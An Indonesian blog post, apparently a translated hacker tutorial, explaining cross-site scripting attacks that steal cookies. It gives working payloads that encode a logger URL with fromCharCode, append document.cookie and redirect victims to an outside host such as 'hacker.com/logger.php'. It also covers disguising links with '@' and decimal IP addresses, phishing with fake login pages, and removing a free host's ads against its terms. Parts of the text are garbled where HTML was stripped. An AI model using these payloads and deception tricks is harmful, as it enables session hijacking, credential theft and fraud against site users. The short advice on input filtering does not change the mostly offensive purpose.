JAVASCRIPT
Jasakom - Melanjutkan artikel sebelumnya, kali ini kita akan melihat
sisi lain dari cookie yang sangat berbahaya ketika cookie bisa dicuri.
Catatan: Untuk
melakukan hal ini Anda membutuhkan sedikit dari pengetahuan javascript tingkat
lanjut, dan beberapa script sisi server seperti perl/php/asp.
Pencurian cookies dapat menjadi masalah serius bagi banyak situs. Seluruhnya tergantung pada bagaimana suatu situs mengeset
keamanannya. Jika suatu situs hanya menggunakan
cookies untuk mengidentifikasi user, maka tentu saja sangat rentan. Jika anda membutuhkan login kemudian seringkali tanpa kecuali
mencoba dan mencuri cookies. Dengan catatan, tentunya username dan password yang tersimpan dalam
cookie dan tidak terenkripsi. Terkadang anda bahkan
dapat mengakses tanpa login. Kita
akan mengambil contoh pada betapa rentannya situs
http://neworder.box.sk saat kita mencuri beberapa tutorial LI, meskipun mereka
tidak rentan akan hal ini karena anda harus login ke situsnya dan password user
tidak ada dalam cookie. (silakan dilihat jika mereka
mencuri suatu tutorial yang menjelaskan bagaimana mengeksploit sebuah hole
dalam dari script mereka. Bagaimana kita akan mengeksploitasi
bug ini adalah sederhana saja kok. Tinggal ketik ini pada browser
http://neworder.box.sk/box.php3?prj=neworder&newonly=1&gfx=neworder&txt=what's+new
Apa sich kelemahan script ini? Tidak
meloloskan karakter terinput yang dicetak ke halaman. Saya
katakan pada anda tentang meloloskan karakter adalah penting. Script tersebut malah
membiarkan sebuah tag sederhana
untuk menghentikan javascript.Jadi hal pertama yang harus kita lakukan adalah menguji dan melihat bagaimana berbagai karakter (jika saja) tidak diloloskan untuk kita gunakan. Setelah memeriksa berbagai karakter berikut ini: ' " ; | < > / dan % kita menemukan bahwa mereka dapat meloloskan karakter ' dan ". Jika tidak, kita akan mengeksploit script php-nya dan memiliki kendali penuh atas situs. Saya akan memberikan sedikit trik yang dalam satu detik dimana kita mampu mendaptkan javascript untuk mencetak ' dan ". Namun untuk saat ini kita harus menghentikan tag
. Jadi kita akhiri
dengan tag
kemudian memasukkan berbagai jagascript yang kita
kehendaki.
Pada
paragraf pertama, telah saya katakan bahwa javascript sangatlah aman, karena
tidak dapat dibaca-tulis file apapun pada hard drive user selain cookies.
Disinilah kita akan memanfaatkan javascript untuk
membaca cookie user NewOrder dan kemudian menggunakan javascript untuk
mengirimkan ke mereka suatu cgi script dimana kita me-log cookie mereka ke
sebuah file teks. Setelah ini kita memeriksa log dari script cgi dan menyimpan
cookie yang tetap terpelihara oleh browser. Atau, kita bisa
mendapatkan username dan password dari cookie dan login ke situs NewOrder
(NewOrder tidak menyimpan password user ke dalam cookie).
Jadi
sekarang untuk mencetak javascript yang akan mencuri cookie
tersebut. Apa yang harus kita lakukan adalah
menggunakan script yang mencetak karakter yang tidak luput ke halaman yang
seolah-olah javascript yang sebenarnya pada situs tersebut. Jadi
kita dapat melihat dan mengedit cookie user. Terdapat
dua masalah utama yang harus ktia atasi. Pertama kita ingin mencetak
suatu string tana menggunakan ' dan " sewaktu
script php situs neworder meloloskan karakter tersebut. Bagaimana
kita melakukan hal ini adalah dengan menggunakan javascript yang tidak
membutuhkan ' atau " dan mencetak berbagai karakternya. Berikut ini
adalah satu cara untuk melakukannya.
Kita membutuhkan %2B sebagai ganti +, karena + menjadi sebuah spasi
saat anda jadikan script. Mungkin
ada cara yang lebih mudah melakukan hal ini selain menggunakan fromCharCode, entahlah =). 0x0068
adalah ascii untuk h.
74 untuk t.. (Anda dapat menggunakan grafik
ascii dari situs http://www.elfqrin.com/docs/hakref/ascii_table.html
):
68=h 74=t
74=t 70=p 3A=: 2F=/ 2F=/ 73=s 69=i 74=t 65=e 2E=. 63=c 6F=o 6D=m 2F=/ 61=a 2E=.
63=c 67=g 69=i 3F=? Dengan kata lain buatlah var u ke
string http://site.com/a.cgi?
Baiklah, jadi kita telah mendapatkan suatu string dalam sebuah
variabel tanpa menggunakan ' atau ". var u = 'http://site.com/a.cgi?'; akan menjadi sama hanya
jika script tidak terfilter pada ' dan ". Sekarang setelah mendapatkan
string apa selanjutnya yang akan kita lakukan? hmm.. apa yang kita coba lakukan
adalah mendapatkan cookie dalam sebuah string dan kemudian mengirimnya ke
script cgi yang me-log apa yang ada dalam cookie. document.cookie
adalah cookie untuk situs tersebut. Jika terdapat lebih dari
satu cookie, maka anda harus menggunakan sedikit trik berikut ini. Cobalah halaman ini untuk belajar bagaimana menangani banyak
cookie. Sekarang kita ingin menambahkan cookie ke akhir url tersebut, jadi:
u %2B= document.cookie;
Ouw! variabel u kita sekarang berupa http://site.com/a.cgi?user_s_cookie
(namun user_s_cookie adalah nilai aktual dari cookie mereka). Jadi sekarang
kita membuat javascript yang mengarahkan user ke url.document.location.replace(u);
Hal ini akan mengirim mereka ke var u kita, dimana a.cqi akan
berubah menjadi suatu script cgi yang hanya me-log apapun yagn di input ke
suatu database. Teknik lain untuk me-log cookie mereka adalah dengan menaruh sesuatu seperti ini:
/(document.cookie)">
Tapi sewaktu filter script ' dan " akan menjadi sebuah url panjang untuk
menaruh fromCharCode pada setiap karakter... pula, anda harus memiliki akses
untuk me-log situs tersebut dengan tujuan memeriksa apakah file-file yang
diminta dari direktori 'somedir'.
Seluruh
teknik pencurian cookie membutuhkan beberapa jenis script di situs anda untuk
me-log cookie sewaktu dikirim sebagai sebuah url.
Sekali anda memiliki cookie user terdapat dua hal yang perlu
diperhatikan. Adakalanya situs yang menaruh
username dan passwordnya di dalam cookie. Dalam kasus
ini anda hanya me-log ke situs dengan hal tersebut. Beberapa situs lain hanya menggunakan cookie sederhana untuk keperluan
otentikasi user. Tanpa meminta login.
Sebagai
contoh www.geocities.com, jika anda mendapatkan sebuah 404 error, akan tercetak pada url seperti ini:
now if you have a cookie of a geocities member you can
go to www.geocities.com and you will automatically be logged in. From there you have full control over their
account.
Namun geocities melakukan beberapa hal untuk menghentikan ini. Mereka
mengarahkan websitenya ke http://geocities.yahoo.com ..
jadi cookie user adalah sebuah cookie yahoo yang
sebenarnya ;( Jika anda mencoba trik yang sama dimana
anda mendapatkan file 404 pada yahoo yang tidak akan mencetak karakter < dan
>. Namun jika anda menemukan suatu script pada yahoo yang
tercetak < dan > anda dapat dengan mudah melakukan hal ini. Dan terdapat script pada yahoo yang rentan terhadap Cross Site
Scripting, beberapa kasus telah dilaporkan ke milis buqtraq dan sayalah yang
menemukan salah satunya.
Jadi
bagaimana anda akan mendapatkan user yang mengunjungi
url ini? cobalah sesuatu seperti ...
sumber untuk
link pemain di www.redlite.com ini:
notice the:
onMouseOver="window.status='http://www.redlite.com/signup2.php?boobs-and-guy';return
true"
and
onMouseOut="window.status='';return
true"
Pada akhirnya ... ini untuk menipu user agar berpikir bahwa ada link
utama disuatu tempat lainnya. Sekali
lagi, menggunakan javascript untuk memanipulasi apa
yang user lihat untuk mengelabuinya.
Script
lainnya pada mesin edge yang rentan terhadap cross site scripting adalah
board.php, berikut ini contoh eksploitasinya
http://www.site.com/board.php?search=
var u =
String.fromCharCode(0x0068);u
%2B= String.fromCharCode(0x0074);u %2B=
String.fromCharCode(0x0074);u
%2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x003A);u
%2B= String.fromCharCode(0x002F);u %2B=
String.fromCharCode(0x002F);u
%2B= String.fromCharCode(0x0062);u %2B=
String.fromCharCode(0x0030);u
%2B= String.fromCharCode(0x0067);u %2B=
String.fromCharCode(0x002E);u
%2B= String.fromCharCode(0x006F);u %2B=
String.fromCharCode(0x0072);u
%2B= String.fromCharCode(0x0067);u %2B=
String.fromCharCode(0x002F);u
%2B= String.fromCharCode(0x0061);u %2B=
String.fromCharCode(0x002E);u
%2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x0068);u
%2B= String.fromCharCode(0x0070);u %2B=
String.fromCharCode(0x003F);u
%2B=
document.cookie;document.location.replace(u); &did=edge0
Jadi bagaimana seorang coder menghentikan rentannya serangan ini? Saya katakan jangan pernah mencetak data yang diinput user kembali
ke user. juga filter keluar <, >, dan
lindugi semua url dengan encoding sebelum memfilter input. Saya sudah menemukan
suatu cara untuk mencuri cookie dalam ikonboard lama
menggunakan profile.cgi, meskipun tidak terlalu besar jumlahnya sewaktu terjadi
celah keamanan yang serius pada ikonboard. Hal ini dikarenakan teknik
pemrograman yang buruk yaitu mencetak input yang tidak difilterisasi. Sekarang ikonboard sudah tidak menggunakan profile.cgi, tidak
mencetak dapat yang diinput ke layar dan memfilter data. Biasanya script
webmail sangat rentan terhadap cross site scripting.. dan adalah benar sebuah kerentanan terjadi pada script
alais-mail nya tim solution script yang saya temukan setahun lalu.
Beberapa
masalah lain dengan javascript dan pencurian cookie:
http://www.peacefire.org/security/hmattach/
- Sebuah
eksploitasi terhadap Hotmail. Saat
hotmail tidak memfilter javascript dan diperbolehkannya lampiran .html untuk
ditampilkan tanpa di download.
http://www.securityspace.com/exploit/exploit_1b.html
http://www.peacefire.org/security/iecookies/
- Pembukaan cookie jar, pembuka remote cookie. Menggunakan
%2F dimaksudkan untuk / membuat IE menganggap bahwa itu adalah suatu situs.
http://homepages.paradise.net.nz/~glineham/cookiemonster.html
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms01-055.asp
- Script aktif sebenarnya, bukannya javascript.
Kemudian
terdapat artikel mengenai :// dan membaca isi file
mengenai rentannya IE, yang baru dilaporkan ke milis buqtraq.. Saya
merencanakan untuk mendiskusikan secara lebih detil saat mengupdate tutorial
ini.
Banyak orang mengatakan kepada saya, "Tapi tak seorang pun
menunjukkan gelagat akan meng-klik link yang terdapat javascript untuk mencuri
cookie" ini memang benar. Saat url sederhana seperti
http://site.com/vulnscript.cgi?
document.location.replace('http://hacker.com/logger.php?'
+ document.cookie);
Itulah
mengapa kita ingin mengelabui mereka agar menganggap url
tidaklah berbahaya. Berikut ini satu cara:
Teknik
mengaburkan url:
Satu cara mengelabui user untuk meng-klik link yang mereka pikir
terhubung ke tempat lain adalah menggunakan trik onmouseover, membuat url
terlihat seolah-olah terhubung ke suatu tempat lain. Tentu saja anda tidak
dapat menggunakan ini saat menggunakan protokol yang tidak mendukung html atau
yang dilengkapi blok javascript dan onmouseover. Jadi maksud dari http://site.com anda mempunyai localhost
http://127.0.0.1 mungkin tidak menolong banyak tentang bagaimana kita
menggunakan trik ini. Saat browser login ke direktori .htaccess, mereka
dapat saja menggunakan sintak berikut ini:
http://username:password@site.com
Anda lihat mengapa hal ini sangatlah penting. Tanpa
password anda dapat memiliki sesuatu seperti :
http://username@site.com
dan akan bekerja dengan baik. Dengan mencoba login ke
site.com melalui username = 'username' dan tanpa password. Sekarang apa yang terjadi bila disana tidak terdapat file .htaccess? maka tidak menjadi masalah apa yang username dan password
masukkan, kemudian me-load halaman secara normal. Jadi sesuatu seperti ini
dapat saja berupa:
http://microsoft.com/site/dir/helpdesk.asp@site.com
Anda lihat bagaimana hal ini biasa digunakan agar orang meng-klik link
dan berpikir keterangan lainnya disuatu tempat? bahkan jika dalam bentuk plain text sudah banyak orang
percaya bahwa link tersebut milik situs microsoft.com.
Ada banyak cara yang berbeda untuk "mengaburkan" url dari
user untuk menolong anda menipu mereka. Salah satu
diantaranya melibatkan peng-konversi an alamat ip ke persamaan decimal.
Saya tidak akan menutupi hal ini, namun terdapat
banyak tutorial lain di internet dimana anda dapat mempelajari hal ini. Saya sekedar membiarkan anda menggunakan script ini untuk secara
otomatis meng-konversi alamat ip ke nilai decimal.
IPa IPb IPc IPd =
Sekarang
gunakan ini yang dimaksudkan dari site.com dan anda akan
mendapatkan sesuatu seperti:
http://microsoft.com/site/dir/helpdesk.asp@3639550308%2F%61%2E%63%67%69%3F
[menyisipkan teknik jahat javascript url ter-encode
disini]
Sekarang anda tidak melihat sesuatu seperti http://site.com/a.cgi? (ini teknik jahat asli javascript)
yang akan menjadi sangat aman untuk user mengatakan apa
yang harus dilakukan. Mari kita melampaui langkah pertama
sekali waktu, sekedar meyakinkan anda mendapatkannya. Pertama buatlah
berbagai nama situs (tidak mesti url yang valid)
http://aol.com/scripts/userid.jsp?
tambahkan karakter
@ ke bagian akhirnya sehingga menjadi:
http://aol.com/scripts/userid.jsp?@
maka alamat ip anda dari localhost dalam form decimal
adalah:
http://aol.com/scripts/userid.jsp?@3639550308
kemudian
selanjutnya dari path pada url yang ter-encoding adalah:
http://microsoft.com/site/dir/helpdesk.asp@3639550308%2F%61%2E%63%67%69%3F
sISI LAIN BELAJAR JAVASCRIPT
Jasakom - Javascript dikenal sebagai bahasa script sisi klien yang diinterpretasikan oleh browser. Bahasa ini sering digunakan untuk membangun halaman web yang dinamis yang dapat berubah dan melakukan..DUMPLING
Artikel ini ditulis oleh seorang hacker bernama b0iler, ditulis bukan untuk mengajari anda menjadi pencuri, namun sebagai bahan pertimbangan dari artikel saya mengenai pencegahan serangan terhadap cookie user:
Berikut ini ringkasan dari artikelnya:
........................
1. Memutus Banner dan membunuh Frame
-------------------------------------------------------
Saya katakan memutus banner, adalah saat anda menggunakan javascript (atau tag lainnya) yang tidak di render oleh browser sama halnya dengan tag html biasa untuk mendapatkan popup banner. Biasa dilakukan secara otomatis oleh webhosting gratis pada halaman web anda. Ide dasar ini adalah memiliki tag yang tidak dirender sebagai html sebenarnya sebelum html dari webhosting tersebut menambahkan banner mereka begitu browser user tidak menemukan banner. Hal yang nyata adalah satu kunci hal yang anda ingin temukan dalam teknik membunuh banner tersebut. Inilah apa yang tag situs gunakan sebagai suatu "kunci". Apa yang saya maksudkan dengan hal ini adalah apakah banner yang mereka tambahkan datang sebelum atau sesudah? Coba perhatikan yang skema HTML yang umum dibuat dibawah ini. dibawah ini.
<html>
<!-script yang ditulis -->
<body>
text
Kemudian saat mengupload halaman dan menampilkannya pada browser. Lihat kode sumber dari halaman dan cari dimana banner situs tersebut ditambahkan. Jika datang sesudah tag dan sebelum tag kemudian anda ingin melihat apakah ditambahkan sebelum dan sesudah <!-- script yang ditulis --> yang ada diantara keduanya. Jika ditambahkan sebelum, maka tag adalah tag "kunci" (keytag) yang mereka tambahkan banner sesudahnya. Sedangkan bila dibawah <!-- script yang ditulis --> maka ketahuilah bahwa keytag ditambahkan setelah tag
Nah begitu kita ketahui dimana mereka menambahkan html banner, apa yang kita lakukan untuk menghentikan proses otomatis tersebut? Kita coba membuat sebuah tag "palsu" dan berharap banner html ditambahkan kesana. Kemudian gunakan javascript untuk mencetak tag asli. Kita dapat melakukan beberapa hal, seperti script dibawah ini:
Dasar untuk menghentikannya.
<noscript>
<keytag> -tag palsu. Sebelum/sesudah tag ini dimana banner situs ditambahkan
<keytag> -tag asli
<script> ,
<keytag> -tag asli.
pencetakan tag dengan javascript - satu hal yang telah dipikirkan oleh para ahli web dan dapat bekerja dengan baik, jika anda mempunyai masalah saat anda menaruh keytag asli kemudian mencoba menggunakan javascript begitu situs bahkan tidak menganggapnya sebagai keytag. Anda mendapat javascript untuk mencetak tag satu huruf setiap kali.
<style>
<keytag> -tag palsu. Sebelum/sesudah tag ini dimana banner situs ditambahkan.
Jika semuanya bekerja dengan baik, semestinya halaman situs anda sudah terbebsa dari popup dan banner flash. Jika tidak saya harap anda harus "bermain-main" dengan memodifikasi javascript yang sudah ada. Setiap webhosting gratis tentunya memiliki keytag dan metode yang berbeda dalam menambah banner. Saya tidak dapat mencoba keseluruhan banner yang ada yang mencobanya.
Saya memutuskan untuk memberikan contoh sebenarnya dari situs gratis yang menambahkan iklan popup atau banner ke seluruh halaman yang anda miliki. Saya akan menggunakan webhosting angelfire. Perlu di ingat, bahwa webhosting tersebut dapat merubah teknik penambahan banner mereka setiap waktu. Jadi script dibawah ini mungkin saja tidak bekerja sebagaimana mestinya. Karena hal ini melanggar TOS (Terms of Service) hostingan tersebut, dan berakibat ditutupnya situs anda tanpa pemberitahuan. Disarankan untuk selalu memback-up data situs Anda ke hard disk OK?
angelfire
<html>
<head>
<title>testing
<body>
kode html yang biasa anda tulis
sebagaimana yang anda lihat, angelfire menaruh iklan mereka tepat setelah tag . Mereka semua memproteksi kita dari teknik menghilangkannya yaitu
. Jadi, kita dapat menaruh sesuatu seperti ini untuk menggagalkannya.
<style>
<body>
<body>
Begitu server angelfire akan menambahkan javascript untuk iklan mereka setelah tag . Menaruh iklannya setelah dan sebelum . Artinya bahwa browser user akan menganggap bahwa dan iklan angelfire adalah css (cascading style sheet).. yang ternyata adalah tag
Adapun yang script ini lakukan adalah memeriksa apakah halaman aktif
tidak berada di atas frame, jika tidak maka script akan
menaruhnya sebagai top frame, menghapus frame lain dari window browser.
2. Memperoleh Script dengan Filter Javascript
-----------------------------------------------------------
Saat anda mengisi info ke sebuah buku tamu. Data
isian tersebut akan ditempatkan pada halaman utama
buku tamu. Dan kapan saja, siapa saja yang sudah mengunjungi
halaman tersebut, kita ingin data mereka dikirim ke
http://www.lameindustries.org. Kita akan
memasukkan script ini ke buku tamu:
Terkadang saat anda ingin menggunakan javascript, terdapat beberapa
form filter yang akan menghentikan tag
Bagaimana saya mengetahui apa yang nilai hex
tersebut lakukan? Saya hanya memeriksa sebuah grafik ascii
dan menambahkan "&" sebelum angka. Sebuah grafik ascii dapat dilihat di situs
www.lameindustries.org/tutorials/tutorials/wtf_is_hex.shtml
Ada beberapa
situasi lain dimana javascript dapat digunakan. Jika anda
dapat menebak filter pada email user, anda dapat menggunakan keterampilan
men-spoofing email untuk mengirimkan suatu email dari seseorang yang mereka
percaya. Jika mereka membukanya anda dapat memiliki email langsung mereka ke
sebuah halaman yang menampilkan suatu pesan seperti ini "session timed
out, please log in again" dan setelah form tersebut dikirimkan ke script
cgi yang akan me-log nya. Hal ini bekerja untuk sebagian
kecil orang, tapi cukup bernilai suatu saat.
Mendapatkan dengan filter javascript dapat memandu anda untuk
mendapatkan cookies seperti forum, shopping cart, situs dan mengarahkan user ke
situs pilihan anda sendiri. Dimanapun ada input yang ditampilkan pada suatu
halaman dimana orang lain mengunjunginya disana ada
seseorang yang menggunakan javascript untuk mencuri informasi. Kenyataannya hingga detik artikel ini diturunkan, telah ditemukan
bahwa lycos dan search engine lainnya tergolong vulnerable untuk javascript
dalam mendeskripsikan website dan nama-nama, baca artikel di www.slashdot.org
untuk informasi lanjut. Hal ini menjamin 100% click untuk berbagai
pencarian situs anda jalankan.
Dibawah ini terdapat sebuah cert advisory concerning insertion of
script (javascript, vbscript, dll..) yang dimasukkan
ke dalam script:
http://www.cert.org/advisories/CA-2000-02.html
Update:
Sudah terdapat advisory (nasehat teknis) baru untuk hotmail dan situs
lain yang menggunakan filter javascript. Permasalahan dalam css dan penggunaan
tag . Sewaktu code berikut ini digunakan untuk me-link javascript akan di eksekusi, terjadilah kemungkinan pencurian cookies,
info atau mengarahkan user ke sebuah halaman login palsu.
link yang
diletakkan pada dapat berarti satu hal. Tentu saja
situs Hotmail telah dipatch sehari setelah laporan mengenai terjadinya Cross
Site Scripting, namun hal tersebut menunjukkan bahwa Hotmail tidaklah 100% aman
dan masin terdapat beberapa celah keamanan yang suatu saat dapat mengambil
script tereksekusi. Juga webmail lainnya, buku tamu, forum diskusi,
dsb... mungkin sangat rentan akan hal ini. Anda dapat
menggunakan exploit hotmail yang lama dan beberapa script lainnya yang
menginjinkan input dan mencetaknya dalam bentuk file .html. Saya
menemukan celah keamanan ini dalam sebuah script di situs www.cyberarmy.com
pada fasilitas webmail mereka. Saya tinggal melakukan ini
: <script type="javascript"> dan mengarahkan user ke sebuah login palsu. Sewaktu mereka login, username dan password mereka dikirim ke
sebuah script yang menulis informasi mereka ke sebuah database dan mereka login
ke script webmail asli kembali. Script yang dibuat oleh tim solusionscripts telah
berhasil mengatasi hal ini. Tapi ini pun masih rentan.
Ada catatan
bahwa field input text biasa bukan hanya satu-satunya cara
untuk memasukkan data ke suatu script. Menyembunyikan fields dan sekelompok variabel juga
terkadang sangat rentan. Beberapa script akan
memfilter seluruh field text, namun tidak memfilter field yang hidden, hal ini mengijinkan
anda untuk memasukkan javascript atau teknik jahat lainnya. Saya tidak akan
berbicara banyak mengenai hal itu, saat seseorang membutuhkan keseluruhan
tutorial dan kerena menulis javascript bukanlah hal pertama yang akan anda coba
untuk mengekploit situs tersebut. Sekelompok variabel yang anda dapat exploit
biasanya terkait satu sama lainnya atau disebut
user-agent, ketika pemeliharaan menjadi hanya satu orang yang menulis ke sebuah
file, mereka setidaknya telah memfilter input (menurut pengalaman saya).
Sungguh mudah untuk menemukan cara memasukkan
javascript jika anda mendapat potongan script tersebut. Terdapat dua cara mudah untuk melakukan hal ini, Pertama, dengan melihat
apakah script tersebut bersifat open source, kemudian download dan perhatikan
kelemahan kode tersebut. Kedua, mencari script/exploit yang
memungkinkan anda melihat sumber script lainnya. Lakukan beberapa
penelitian pada exploit lainnya dengan script lain pula (atau pada webservernya
sendiri).
Subscribe to:
Posts (Atom)